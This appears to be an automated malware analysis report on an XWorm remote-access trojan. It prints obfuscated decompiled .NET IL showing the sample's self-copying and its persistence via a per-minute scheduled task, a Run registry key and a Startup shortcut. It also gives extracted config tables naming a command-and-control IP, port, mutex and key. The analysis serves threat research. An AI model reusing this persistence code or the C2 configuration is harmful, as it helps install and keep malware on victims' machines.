Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::NLJsNphJ3A9OTPIud6AL5g37a5CONJbYZ1AGAfcgKnNiNBmJutzZJZWW8nXAJzJMjj ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::FdztcFi8aodkDy9WySCof3afVN99hCjoYw4LWQmRpYWPrUGoxUclloOnlknAzdzQKD call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::FdztcFi8aodkDy9WySCof3afVN99hCjoYw4LWQmRpYWPrUGoxUclloOnlknAzdzQKD ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::69fPJWnr1s6KPtDDgxRRE5ZpGw6BqyYXzD9JjGGPPgzG8t3jdBTvT5gHiiezyTUZOF call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::69fPJWnr1s6KPtDDgxRRE5ZpGw6BqyYXzD9JjGGPPgzG8t3jdBTvT5gHiiezyTUZOF ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::kvFWJmMqv9n1Y4z7YiAuxlRsMkMfSBCnZLyAQD6Mj9fqiHTEgQUIgCgKl2858WjtFx call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::kvFWJmMqv9n1Y4z7YiAuxlRsMkMfSBCnZLyAQD6Mj9fqiHTEgQUIgCgKl2858WjtFx leave.s IL_00CB: call System.Boolean Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::HCda82cImj4N1hsS7kiOfdIyrTeGlZoIf9aO3Y8Fh() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00CB: call System.Boolean Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::HCda82cImj4N1hsS7kiOfdIyrTeGlZoIf9aO3Y8Fh() call System.Boolean Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::HCda82cImj4N1hsS7kiOfdIyrTeGlZoIf9aO3Y8Fh() brtrue.s IL_00D8: call System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::zwKitwCFs1TD0FjDVk28xJMPTNglAwBoKyP3cOGy7pha6P7cmNJeXTpSEtRtfc49Me() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::zwKitwCFs1TD0FjDVk28xJMPTNglAwBoKyP3cOGy7pha6P7cmNJeXTpSEtRtfc49Me() leave.s IL_00EE: call System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::xxYfkRITJZtSs17CAQmY5wLzVhFGFnrqIwzwPyA9RCckOFg43nAE7onyFMngvnQ4o1() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00EE: call System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::xxYfkRITJZtSs17CAQmY5wLzVhFGFnrqIwzwPyA9RCckOFg43nAE7onyFMngvnQ4o1() call System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::xxYfkRITJZtSs17CAQmY5wLzVhFGFnrqIwzwPyA9RCckOFg43nAE7onyFMngvnQ4o1() ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::69fPJWnr1s6KPtDDgxRRE5ZpGw6BqyYXzD9JjGGPPgzG8t3jdBTvT5gHiiezyTUZOF ldstr \ ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::kvFWJmMqv9n1Y4z7YiAuxlRsMkMfSBCnZLyAQD6Mj9fqiHTEgQUIgCgKl2858WjtFx call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_5 ldloc.s V_5 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_0135: ldloc.0 ldloc.s V_5 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_014C: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_6 ldloc.s V_6 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::3orFA7yM2T36YV8nbd0u4uPaqVTIutE9MOZnJOVlp call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_0177: ldstr "schtasks.exe" dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_7 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0177: ldstr "schtasks.exe" ldstr schtasks.exe newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_9 ldloc.s V_9 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.String Stub.Mp9SfO7QuK3KcSemWTiEg5gSj5gdYK57s6l0XjNcnUz7dKiWbylUQKTZ4Ig8jhPrZN2kXqztYE5MRtAOJchIplpqVEbzPNth5F::GSsRUoyDZaU9kbN24LKB9AMvdFuvUO7NQ71a91MUB1TUi88aXo8USm49cUdQBDbzwofzN0uWak6TxVVRbuxYH6ZlTGkW1482G4() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_01DD: ldloc.s V_9 ldloc.s V_9 ldc.i4.5 <null> newarr System.String stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldstr /create /f /RL HIGHEST /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_14 ldc.i4.1 <null> ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::kvFWJmMqv9n1Y4z7YiAuxlRsMkMfSBCnZLyAQD6Mj9fqiHTEgQUIgCgKl2858WjtFx call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_14 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_14 ldc.i4.3 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_14 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_14 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) br.s IL_0221: ldloc.s V_9 ldloc.s V_9 ldc.i4.5 <null> newarr System.String stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldstr /create /f /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_14 ldc.i4.1 <null> ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::kvFWJmMqv9n1Y4z7YiAuxlRsMkMfSBCnZLyAQD6Mj9fqiHTEgQUIgCgKl2858WjtFx call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_14 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_14 ldc.i4.3 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_14 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_14 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_9 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_8 ldloc.s V_8 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave.s IL_0242: call My.gFRJ7adPVp0lTbgBoJPN4Iqk8ISbQXjEfqYkX6N1M1Geb7qlVHzwGIQTgOkD8xUzKP My.wFtyNwEgXrzb3zUOedBwCwqJFiR7GBpnynpHRsO52LO2Kzhu4pBM9ZJAqnCO4fTDuj::pJCIegFpr7nNWIJk1orLoSV9mIJR5Yhl2xEm9eS3226kT7jdeaanpo3AjjdQU5VMLc() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_10 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0242: call My.gFRJ7adPVp0lTbgBoJPN4Iqk8ISbQXjEfqYkX6N1M1Geb7qlVHzwGIQTgOkD8xUzKP My.wFtyNwEgXrzb3zUOedBwCwqJFiR7GBpnynpHRsO52LO2Kzhu4pBM9ZJAqnCO4fTDuj::pJCIegFpr7nNWIJk1orLoSV9mIJR5Yhl2xEm9eS3226kT7jdeaanpo3AjjdQU5VMLc() call My.gFRJ7adPVp0lTbgBoJPN4Iqk8ISbQXjEfqYkX6N1M1Geb7qlVHzwGIQTgOkD8xUzKP My.wFtyNwEgXrzb3zUOedBwCwqJFiR7GBpnynpHRsO52LO2Kzhu4pBM9ZJAqnCO4fTDuj::pJCIegFpr7nNWIJk1orLoSV9mIJR5Yhl2xEm9eS3226kT7jdeaanpo3AjjdQU5VMLc() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::kvFWJmMqv9n1Y4z7YiAuxlRsMkMfSBCnZLyAQD6Mj9fqiHTEgQUIgCgKl2858WjtFx call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.0 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_027D: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_11 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_027D: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::kvFWJmMqv9n1Y4z7YiAuxlRsMkMfSBCnZLyAQD6Mj9fqiHTEgQUIgCgKl2858WjtFx call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_12 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldloc.s V_12 stelem.ref <null> ldloc.s V_15 stloc.s V_16 ldloc.s V_16 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_17 ldloc.s V_17 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_17 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_17 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0302: stloc.s V_18 ldloc.s V_16 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_12 stloc.s V_18 ldloc.s V_18 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_19 ldloc.s V_19 ldc.i4.0 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_19 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_18 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_19 ldloc.s V_19 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_19 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_18 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_18 ldloc.s V_12 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::ibGwo02F0hHoRnpgQeunIWUjwkfx0yX2dIQx1fPrz leave.s IL_0381: call System.Void Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::RQ31YCWHMplVmuKuI8uDLmuWuwrsameCE13amErFw() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_13 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0381: call System.Void Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::RQ31YCWHMplVmuKuI8uDLmuWuwrsameCE13amErFw() call System.Void Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::RQ31YCWHMplVmuKuI8uDLmuWuwrsameCE13amErFw() call System.String Stub.Mp9SfO7QuK3KcSemWTiEg5gSj5gdYK57s6l0XjNcnUz7dKiWbylUQKTZ4Ig8jhPrZN2kXqztYE5MRtAOJchIplpqVEbzPNth5F::GSsRUoyDZaU9kbN24LKB9AMvdFuvUO7NQ71a91MUB1TUi88aXo8USm49cUdQBDbzwofzN0uWak6TxVVRbuxYH6ZlTGkW1482G4() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_0397: ldnull call System.Void Stub.a2rnf7lhy7BEyRxqQrxHXsFwQWZG8mNzqF0PFF2Df::7XkZMx68oy857GWUnxycYbLP5AO7ID536oDfD9VIc() ldnull <null> ldftn System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::NyxWrNEoO1bdVrHPCv40mAy24nbv3mgTanl9FPn3QfQrAWHtyk7apU6sxRc2ihV5yQa6Bw3PGaFAEiwEvqzWuA1KZB00PLvdC0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::V9JFQYxqMcMCb005MAUreV1SmlwPngTns6mDAIVjAaF7ZWW8tmXIVOe3dljGhRFBGpXzBbmvkSyACAwGyy5SJylCZw9NuI8PeR() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null> |
|
Name0 | Value |
|---|---|
| Mutex | 0SDTE1E2ZYjZQsFi |
| CnC | 172.245.27.131 |
| Port | 6000 |
|
Config. Field0 | Value |
|---|---|
| Mutex | 0SDTE1E2ZYjZQsFi |
| Hosts | 172.245.27.131 |
| Port | 6000 |
| KEY | 12581258 |
| USBNM | <XWormmm> |
| LoggerPath | %AppData% |
| family | xworm |
|
Name0 | Value | Location |
|---|---|---|
| Mutex | 0SDTE1E2ZYjZQsFi Malicious |
5922ffeb6ed95c70df6e06260204344b |
| CnC | 172.245.27.131 Malicious |
5922ffeb6ed95c70df6e06260204344b |
| Port | 6000 Malicious |
5922ffeb6ed95c70df6e06260204344b |